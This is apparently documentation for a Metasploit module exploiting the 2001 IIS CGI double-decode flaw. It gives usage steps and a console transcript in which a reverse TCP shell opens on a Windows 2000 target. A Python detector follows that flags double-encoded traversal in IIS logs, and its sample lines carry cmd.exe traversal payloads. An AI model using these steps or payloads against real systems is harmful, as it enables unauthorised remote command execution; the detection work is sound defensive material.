## Vulnerable Application

This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001.

This module has been tested successfully on:

* Windows 2000 Professional (SP0) (EN)
* Windows 2000 Professional (SP1) (AR)
* Windows 2000 Professional (SP1) (CZ)
* Windows 2000 Server (SP0) (FR)
* Windows 2000 Server (SP1) (EN)
* Windows 2000 Server (SP1) (SE)

Note: This module will leave a Metasploit payload in the IIS scripts directory.

## Verification Steps

1. `use exploit/windows/iis/ms01_026_dbldecode`
1. `set RHOSTS [IP]`
1. `set PAYLOAD windows/shell/reverse_tcp`
1. `set LHOST [IP]`
1. `run`

## Options

### WINDIR

The Windows directory name of the target host. The directory name will be detected automatically if not set.

### DEPTH

Traversal depth to reach the drive root (default: `2`).

## Scenarios

### Windows 2000 Server (SP0) (FR)

```
msf6 > use exploit/windows/iis/ms01_026_dbldecode
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
rhosts => 192.168.200.175
msf6 exploit(windows/iis/ms01_026_dbldecode) > check
[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/iis/ms01_026_dbldecode) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using Windows directory "winnt"
[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
[*] Command Stager progress - 66.67% done (40/60 bytes)
[*] Command Stager progress - 100.00% done (60/60 bytes)
[*] Triggering payload "qQErEZeB.exe" via a direct request...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.175
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target

Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----

c:\inetpub\scripts>hostname
hostname
win2k-srv-fr
```
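The double-decode flaw described under "Vulnerable Application" is triggered by a request path that is clean after the one round of percent-decoding a correct server performs before its path checks, but turns into `..\` or `../` after a second round. The following detector, an added example that is not part of the Metasploit module or its documentation, decodes each logged URI stem twice and reports requests whose traversal only appears after the second decode. It assumes a W3C extended log layout of `date time c-ip cs-method cs-uri-stem cs-uri-query sc-status`; the log lines are constructed for illustration and do not come from a real server.

```python
"""Flag double-URL-encoded directory traversal in IIS request logs.

Decodes each logged URI stem twice: a path that already contains "..\\" or
"../" after one decode is ordinary traversal; one that only shows it after
the second decode is the double-decode pattern.  Benign double-encoded
names (e.g. %2520 becoming a space) are not flagged.
"""
import re
from urllib.parse import unquote

# Assumed W3C extended log layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG_LINE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)
TRAVERSAL = re.compile(r"\.\.[\\/]")  # ".." followed by a backslash or slash

# Constructed sample lines, not taken from any real server.
SAMPLE_LOG = """\
2022-06-28 12:34:01 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 200
2022-06-28 12:34:02 10.0.0.5 GET /scripts/..%%35c..%%35cwinnt/system32/cmd.exe /c+dir 200
2022-06-28 12:34:03 10.0.0.5 GET /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe /c+dir 200
2022-06-28 12:34:04 10.0.0.7 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir 404
2022-06-28 12:34:05 10.0.0.9 GET /index.html - 200
2022-06-28 12:34:06 10.0.0.9 GET /docs/report%2520final.html - 200
"""


def classify_uri(stem):
    """Return 'traversal' if one decode already yields '..\\' or '../',
    'double-decode' if it only appears after a second decode, else None."""
    once = unquote(stem)          # what a correct server checks against
    if TRAVERSAL.search(once):
        return "traversal"
    twice = unquote(once)         # what a double-decoding server acts on
    if TRAVERSAL.search(twice):
        return "double-decode"
    return None


def scan_log(text):
    """Parse log lines and return (ip, stem, status, verdict) for every hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip header or malformed lines
        verdict = classify_uri(m["stem"])
        if verdict:
            hits.append((m["ip"], m["stem"], int(m["status"]), verdict))
    return hits


if __name__ == "__main__":
    for ip, stem, status, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:13} {status} {ip} {stem}")
```

The three `double-decode` hits cover the encodings (`%255c`, `%%35c`, `%25%35%63`) that all decode to `%5c` on the first pass; the single-encoded line is reported as plain `traversal` and its 404 shows what a server that decodes once returns. Pair this with a file-system check for unexpected `.exe` files in the IIS scripts directory, since the module notes that it leaves its payload there and may need manual cleanup.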